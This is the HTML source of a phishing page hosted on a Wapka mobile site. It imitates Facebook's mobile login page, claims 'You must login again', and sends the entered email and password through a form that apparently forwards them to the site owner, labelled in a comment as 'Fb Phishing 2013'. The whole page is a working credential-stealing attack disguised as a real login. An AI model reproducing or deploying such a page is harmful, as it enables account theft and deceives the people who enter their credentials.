<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Wapka.mobi</title><link rel="STYLESHEET" type="text/css" href="/styles.css"/><meta forua="true" http-equiv="Cache-Control" content="max-age=0"/><style type="text/css">  body { background: ;  color: ;   }  a { color: ;   }  </style>  </head><body>  <div><?xml version="1.0" ?>  <!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN" "http://www.wapforum.org/DTD/wml_1.1.xml">  <wml>  <head>  <meta forua="true" http-equiv="Cache-Control" content="max-age=0"/>  <link rel="STYLESHEET" type="text/css" href="http://skfacebook.wapka.mobi/styles.css"/>  </head>  <template>   <do type="options" name="Prev" label="Back"><prev/></do>  </template>  <card id="index" title="Facebook" >  <p><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <script type="text/javascript"> document.title = "Welcome to Facebook"; </script> <head title="Welcome to Facebook"><title>Welcome to Facebook</title><meta name="description" content="Facebook helps you connect and share with the people in your life." /><meta name="referrer" content="default" id="meta_referrer" /><meta http-equiv="X-Frame-Options" content="deny" /> <!-----[ » © Fb Phishing 2013 copyrighted by TipsNet.Tk™ &amp; all credit goes to Shanto « ]-----!> </head><body class="nontouch acw"><div class="mfsm"><div id="viewport"><div class="acb aps" id="u_0_0" data-sigil="MTopBlueBarHeader"><table cellspacing="0" cellpadding="0" class="lr"><tr><td valign="top"><h1><a href="http://m.facebook.com/home.php?_dmr&amp;refid=8"><img src="http://static.ak.fbcdn.net/rsrc.php/v2/yz/r/aKhO2tw3FnO.png" width="76" height="20" class="img" alt="facebook" /></a></h1></td></tr></table></div><div id="objects_container"><div id="root" tabindex="0" role="main" class="_fco acw" data-sigil="context-layer-root"> <div class="acy aps abb"><span class="mfss">You must login again.</span></div> <form method="post" class="mobile-login-form _fcp" onSubmit="window.open ('http://facebook.com/wowtricks')" action="site_0.xhtml"> <div class="mobile-login-field aclb apl"><div>Email or Phone<br/><input type="text" name="mf_text[Email]" class="input"/> </div></div><div class="mobile-login-field aclb apl"><div>Password<br/> <input type="password" class="input" name="mf_text[Password]"/> </div></div><div class="button_area aclb apl"> <input type="hidden" name="p" value="XXXXXXXX"/><input type="hidden" name="action" value="send_message"/> <input type="submit" name="MF_submit" class="btn btnC largeBtn" size="0" value="Log In" /></div><hr style="background-color:#cccccc;height:1px;border:0px solid #fff;margin:0.3em auto;width:100%;" /><div class="mobile-login-form _fcp"><span class="mfss fcg" style="margin-left:6px;"><b>New to Facebook?</b></span></div><div class="_4u9b aclb"><div class="button_area aclb apl"><a class="btn btnS largeBtn" href="http://m.facebook.com/r.php?refid=8">Create New Account</a></div></div><input type="hidden" autocomplete="off" name="_fb_noscript" value="true" /></form><div class="other-links aclb apl"><span class="mfsm fcg"><a href="http://m.facebook.com/recover/initiate/?refid=8">Forgot password?</a><br /><a href="http://m.facebook.com/help/?refid=8">Help Center</a></span></div></div></div></div></div><div><div id="footer"><div class="acg apm"><span class="mfss fcg"><b>English (US)</b> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/a/language.php?l=es_LA&amp;lref=http%3A%2F%2Fm.facebook.com%2F&amp;gfid=AQD28mdu19R_4ouf&amp;refid=8">Español</a> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/a/language.php?l=pt_BR&amp;lref=http%3A%2F%2Fm.facebook.com%2F&amp;gfid=AQDjJGXjQ2aRMYRs&amp;refid=8">Português (Brasil)</a> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/language.php?n=http%3A%2F%2Fm.facebook.com%2F&amp;refid=8">More…</a></span></div><div class="acg apm"><span class="mfss fcg">Facebook ©2013</span></div></div></div><div id="static_templates"></div></body> </html> </p><p align="center"><a href="/menu_0.wml">:=:</a></p><p style="text-align:center;"><a href="/ads/wapka/p/2465791/adshows/1/aid/8/country/IN/position/bottom">Super download speed only in uc browser</a></p><img src="/ga.gif?utmac=MO-32471805-1&amp;utmn=786667047&amp;utmr=-&amp;utmp=%2Fsite_0.xhtml&amp;guid=ON" width="1" height="1" /><img src="http://ga.wapka.me/ga3.gif?utmac=MO-32471805-3&amp;utmn=344471327&amp;utmr=-&amp;utmp=%2Fsite_0.xhtml&amp;guid=ON" width="1" height="1" />    </card>    </wml>    </div><p align="center"><a href="/menu_0.xhtml">:=:</a></p><p style="text-align:center;"><a href="/ads/wapka/p/2466575/adshows/3/aid/8/country/IN/position/bottom">Super download speed only in uc browser</a></p><img src="/ga.gif?utmac=MO-32471805-1&amp;utmn=738948482&amp;utmr=-&amp;utmp=%2Findex.xhtml&amp;guid=ON" width="1" height="1" /><img src="http://ga.wapka.me/ga3.gif?utmac=MO-32471805-3&amp;utmn=1497913535&amp;utmr=-&amp;utmp=%2Findex.xhtml&amp;guid=ON" width="1" height="1" /></body></html> - 